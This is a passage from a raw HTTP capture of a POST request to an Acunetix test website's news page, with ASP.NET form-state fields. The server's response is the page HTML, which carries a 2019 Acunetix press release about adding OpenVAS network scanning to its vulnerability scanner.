pb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 